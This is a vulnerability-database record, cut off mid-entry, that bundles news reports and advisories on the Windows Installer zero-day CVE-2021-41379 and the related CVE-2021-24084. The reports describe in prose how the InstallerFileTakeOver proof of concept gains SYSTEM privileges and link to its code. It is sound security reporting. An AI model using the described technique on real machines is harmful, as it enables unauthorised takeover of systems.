{"id": "THREATPOST:E405927D7A8A492019D1B6552C396830", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Attackers Actively Target Windows Installer Zero-Day", "description": "Attackers are actively exploiting a Windows Installer zero-day vulnerability that was discovered when a patch Microsoft issued for another security hole inadequately fixed the original and unrelated problem.\n\nOver the weekend, security researcher [Abdelhamid Naceri](<https://github.com/klinix5>) discovered a Windows Installer elevation-of-privilege vulnerability tracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) that Microsoft [patched](<https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/>) a couple of weeks ago as part of its November [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/>).\n\nHowever, after examining the fix, Naceri found a bypass as well as an even more concerning zero-day privilege-elevation bug. The researcher posted a [proof of concept (POC) exploit](<https://github.com/klinix5/InstallerFileTakeOver>) Tuesday on GitHub for the newly discovered bug that he said works on all currently-supported versions of Windows.\n\nIf exploited, the POC, called InstallerFileTakeOver, gives an actor administration privileges in Windows 10, Windows 11 and Windows Server when logged onto a Windows machine with Edge installed.\n\n## **Peer Research Confirms Exploit and Active Attacks**\n\nResearchers at Cisco Talos Security Intelligence and Research Group as well as others confirmed the POC can be reproduced as well as corroborating evidence that threat actors were already exploiting the bug.\n\n\u201cThis vulnerability affects every version of Microsoft Windows, including fully patched Windows 11 and Server 2022,\u201d according to a [post on the Cisco Talos blog](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) by\n\nJaeson Schultz, technical leader for Cisco Talos. \u201cTalos has already detected malware samples in the wild that are attempting to take advantage of this vulnerability.\u201d\n\nOther researchers also confirmed on Twitter that the POC functions as advertised to deliver local privilege escalation.\n\n\u201cCan confirm this works, local priv esc,\u201d [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1462721449425264645%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2021%2F11%2F23%2Fwindows_lpe%2F>) security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog>), who said he tested it on Windows 10 20H2 and Windows 11. \u201cThe prior patch MS issued didn\u2019t fix the issue properly.\u201d\n\n## **Discovery and More Details**\n\nAs detailed by Microsoft, CVE-2021-41379 is a Windows Installer elevation of privilege vulnerability with a rating of low on the Common Vulnerability Scoring System.\n\n\u201cAn attacker would only be able to delete targeted files on a system,\u201d according to [Microsoft\u2019s notes](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) on the flaw. \u201cThey would not gain privileges to view or modify file contents.\u201d\n\nHowever, Microsoft\u2019s patch for the bug did not fix the vulnerability correctly, allowing Naceri to bypass it during his analysis of the patch, he said in his GitHub post of the POC.\n\nHowever, that bypass was small potatoes compared to a variant of CVE-2021-41379 that he discovered during his research that is \u201cmore powerful than the original one,\u201d which is why Naceri chose to publish a POC of that flaw instead, he wrote.\n\nThe code Naceri released leverages the discretionary access control list (DACL) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI file, allowing an attacker to run code as an administrator, Cisco Talos\u2019 Schultz explained in his post.\n\n## **Wait for the Patch**\n\nThe associated POC works in every supporting windows installation, including Windows 11 and Server 2022 with the November 2021 patch, as well as in server installations, Naceri wrote.\n\n\u201cWhile group policy by default doesn\u2019t allow standard users to do any MSI operation, the administrative install feature thing seems to be completely bypassing group policy,\u201d he wrote.\n\nDue to the \u201ccomplexity\u201d of the vulnerability, Naceri said that the best workaround available for the flaw at this time \u201cis to wait Microsoft to release a security patch.\n\n\u201cAny attempt to patch the binary directly will break Windows installer,\u201d he wrote, adding that those affected should \u201cwait and see how Microsoft will screw the patch again\u201d before taking any mitigation action.\n\nA Microsoft spokesperson told BleepingComputer that the company is aware of Naceri\u2019s disclosure and \u201cwill do what is necessary\u201d to keep customers \u201csafe and protected,\u201d according to [a published report](<https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/>).\n\n\u201cAn attacker using the methods described must already have access and the ability to run code on a target victim\u2019s machine,\u201d the spokesperson said, according to the report.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d an on-demand Town Hall with Eric Kaiser, Uptycs\u2019 senior security engineer, and find out how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ to access the on-demand event!_**\n", "published": "2021-11-24T14:09:18", "modified": "2021-11-24T14:09:18", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.9, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://threatpost.com/attackers-target-windows-installer-bug/176558/", "reporter": "Elizabeth Montalbano", "references": ["https://github.com/klinix5", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379", "https://threatpost.com/microsoft-nov-patch-tuesday-fixes-six-zero-days-55-bugs/176143/", "https://msrc.microsoft.com/update-guide/", "https://github.com/klinix5/InstallerFileTakeOver", "https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html", "https://twitter.com/GossiTheDog/status/1462721449425264645?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1462721449425264645%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2021%2F11%2F23%2Fwindows_lpe%2F", "https://twitter.com/GossiTheDog", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379", "https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/", "https://bit.ly/3wf2vTP", "https://bit.ly/3wf2vTP"], "cvelist": ["CVE-2021-24084", "CVE-2021-41379"], "immutableFields": [], "lastseen": "2021-11-30T01:40:15", "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "cve", "idList": ["CVE-2021-24084", "CVE-2021-41379"]}, {"type": "githubexploit", "idList": ["291894F9-38D4-5877-8B8F-EF46C6D23B82", "3AA8003E-06D3-57B2-BB7E-43616295A4B7", "DF9C9272-7F4D-5362-A6BF-18A60A5E907D"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "HIVEPRO:810C0A801A0950878F0BC43C27E1F429"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8", "MALWAREBYTES:DD6D89E80999E3C77B7E79F3B34929B5"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084", "MS:CVE-2021-41379"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_NOV_5007186.NASL", "SMB_NT_MS21_NOV_5007189.NASL", "SMB_NT_MS21_NOV_5007192.NASL", "SMB_NT_MS21_NOV_5007205.NASL", "SMB_NT_MS21_NOV_5007206.NASL", "SMB_NT_MS21_NOV_5007207.NASL", "SMB_NT_MS21_NOV_5007215.NASL", "SMB_NT_MS21_NOV_5007233.NASL", "SMB_NT_MS21_NOV_5007245.NASL", "SMB_NT_MS21_NOV_5007246.NASL", "SMB_NT_MS21_NOV_5007255.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:E5721E7C94293776737FD29EE61C94E2", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8", "THN:BABD510622DAA320F3F1F55EEDD7549A"]}, {"type": "threatpost", "idList": ["THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80"]}, {"type": "zdi", "idList": ["ZDI-21-1308", "ZDI-21-178"]}]}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "cve", "idList": ["CVE-2021-24084"]}, {"type": "githubexploit", "idList": ["3AA8003E-06D3-57B2-BB7E-43616295A4B7"]}, {"type": "hivepro", "idList": ["HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44"]}, {"type": "kaspersky", "idList": ["KLA12071", "KLA12341", "KLA12345"]}, {"type": "krebs", "idList": ["KREBS:4CBEC9501222521F7CCF1D5ECAD51297"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3E06E8EEA54E8EF995E6B42AFEDC9FA8"]}, {"type": "mscve", "idList": ["MS:CVE-2021-24084"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44"]}, {"type": "thn", "idList": ["THN:48C46A645A455217EADCA99ECBFB18B8"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:BF445076196AE435921E0B3C4AA3CE5C", "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80"]}, {"type": "zdi", "idList": ["ZDI-21-178"]}]}, "exploitation": null, "vulnersScore": 6.1}, "_state": {"dependencies": 1647589307, "score": 0}}

{"thn": [{"lastseen": "2022-05-09T12:37:52", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 &amp; 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T09:11:00", "type": "thn", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "modified": "2021-12-03T03:42:06", "id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEixE9g-lXbfi04ffXtXrVqyoSpB_rf6Xn-3UD4qDKdyKWD2TaCbvUtbUMmIbDUiMA3xnT8OdE411V7_fx1D1kuieTuYdHoVsC1SoBl69hpqZkwOnyA6NrQdijQkPLyKGgpd3Umvvds1Cw76DTRtk-jYcUcMS7l6HHe68rkzx4pI16PGnMHYxy04yi1U>)\n\nAttackers are actively making efforts to exploit a new variant of a recently disclosed privilege escalation vulnerability to potentially execute arbitrary code on fully-patched systems, once again demonstrating how adversaries move quickly to weaponize a publicly available exploit.\n\nCisco Talos [disclosed](<https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html>) that it \"detected malware samples in the wild that are attempting to take advantage of this vulnerability.\"\n\nTracked as [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>) and discovered by security researcher Abdelhamid Naceri, the elevation of privilege flaw affecting the Windows Installer software component was originally resolved as part of Microsoft's [Patch Tuesday updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) for November 2021.\n\nHowever, in what's a case of an insufficient patch, Naceri found that it was not only possible to bypass the fix implemented by Microsoft but also [achieve](<https://twitter.com/wdormann/status/1462607586272976901>) local privilege escalation via a newly discovered zero-day bug.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgAfxkfmkohSpEjMhQZH5LNqwQ1pen7O9L6K2QMRFBjQt_93j5vdXaqk25vj1EgZFyrSPMKMbPL_H_4wzzfmo8AD1z11O900nY3rqYMjhBmVpXrXb-PnYDbp3RrkfeTpctYgyD4wSlXli4azzDxKLTfqLL2Qqs-uPTjf7HbPXJTwIniEqWf1DChqwZW>)\n\nThe proof-of-concept (PoC) exploit, dubbed \"[InstallerFileTakeOver](<https://github.com/klinix5/InstallerFileTakeOver>),\" works by overwriting the discretionary access control list ([DACL](<https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists>)) for Microsoft Edge Elevation Service to replace any executable file on the system with an MSI installer file, allowing an attacker to run code with SYSTEM privileges.\n\nAn attacker with admin privileges could then abuse the access to gain full control over the compromised system, including the ability to download additional software, and modify, delete, or exfiltrate sensitive information stored in the machine.\n\n\"Can confirm this works, local priv esc. Tested on Windows 10 20H2 and Windows 11. The prior patch MS issued didn't fix the issue properly,\" [tweeted](<https://twitter.com/GossiTheDog/status/1462721449425264645>) security researcher Kevin Beaumont, corroborating the findings.\n\nNaceri noted that the latest variant of CVE-2021-41379 is \"more powerful than the original one,\" and that the best course of action would be to wait for Microsoft to release a security patch for the problem \"due to the complexity of this vulnerability.\"\n\n\"We are aware of the disclosure and will do what is necessary to keep our customers safe and protected,\" a Microsoft spokesperson told The Hacker News via email. \"An attacker using the methods described must already have access and the ability to run code on a target victim's machine.\"\n\n**_Update:_** 0patch has issued a free micropatch to remediate the \"InstallerFileTakeOver\" zero-day flaw in Windows Installer component that could be abused by a local unprivileged user to overwrite an existing system executable and then arbitrarily change its contents to gain SYSTEM permissions.\n\n\"It doesn't take a lot of imagination to see that taking over an executable file that is being used by a privileged process can get one's code executed with such process' privileges,\" 0patch's Mitja Kolsek [said](<https://blog.0patch.com/2021/12/free-micropatches-for.html>) in a write-up published Thursday.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T08:10:00", "type": "thn", "title": "Warning \u2014 Hackers Exploiting New Windows Installer Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-12-03T03:42:18", "id": "THN:48C46A645A455217EADCA99ECBFB18B8", "href": "https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2021-12-14T21:19:15", "description": "Windows Mobile Device Management Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Mobile Device Management Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-24084", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-12-06T18:18:03", "description": "Windows Installer Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T08:00:00", "type": "mscve", "title": "Windows Installer Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-09T08:00:00", "id": "MS:CVE-2021-41379", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-01T05:28:01", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Microsoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf>)\n\nAn improperly patched Windows vulnerability (CVE-2021-24084) can lead to local privilege escalation and information disclosure. The vulnerability was disclosed in October 2020 and even after Microsoft addressed this vulnerability in February 2021\u2019s Patch Tuesday, a researcher was able to exploit the patched vulnerability making it another zero-day made by improper patching.\n\nCVE-2021-24084 was an information disclosure vulnerability in the Windows Mobile Device Management component but later it was discovered that it could be exploited for local privilege escalation that allows an attacker to gain admin privilege and reading arbitrary files even if they don\u2019t have the permissions to do so. All the versions of Windows 10 even after the November patch are affected by this vulnerability.\n\nAfter examining Microsoft&#x27;s fix, [Abdelhamid Naceri](<https://github.com/klinix5/InstallerFileTakeOver>), the security researcher who discovered this vulnerability, discovered a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability. He also made the proof-of-concept available to the public.\n\nAn unofficial micro patch has been released by 0patch and will be available for free until Microsoft releases an official patch for the vulnerability.\n\n#### Vulnerability Details\n\n\n\n#### Patch Link\n\n<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>\n\n#### References\n\n<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>\n\n<https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html>\n\n<https://www.techradar.com/sg/news/nasty-windows-10-vulnerability-gets-a-patch-but-not-from-microsoft>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-12-01T04:26:33", "type": "hivepro", "title": "Microsoft could not patch this vulnerability yet again", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-01T04:26:33", "id": "HIVEPRO:810C0A801A0950878F0BC43C27E1F429", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability-yet-again/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-11-26T17:20:32", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Microsoft-could-not-patch-this-vulnerability_TA202150-1.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FMicrosoft-could-not-patch-this-vulnerability_TA202150-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nMicrosoft released patches for 44 vulnerabilities on November 9th. CVE-2021-41379 was among them. However, installing this patch does not completely eliminate the vulnerability.\n\nAn [exploit](<https://github.com/klinix5/InstallerFileTakeOver>) for a new Windows zero-day local privilege elevation vulnerability that grants admin privileges in Windows 10, Windows 11, and Windows Server has been publicly disclosed by a security researcher, [Abdelhamid Naceri](<https://github.com/klinix5/>).\n\nCVE-2021-41379 is a privilege escalation vulnerability that allows an attacker with limited access on a compromised system to move laterally within the same network. All the versions of Windows 10, Windows 11 and Windows server are affected by this vulnerability.\n\nAfter examining Microsoft&#x27;s fix,, the security researcher who discovered this vulnerability, discovered a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability.\n\nThere are currently no workarounds for this vulnerability. Any attempt to directly patch the binary will result in a failure of the Windows installer. We must wait for Microsoft to resolve this issue.\n\n#### Vulnerability Details\n\n\n\n#### References\n\n<https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T10:56:28", "type": "hivepro", "title": "Microsoft could not patch this vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, 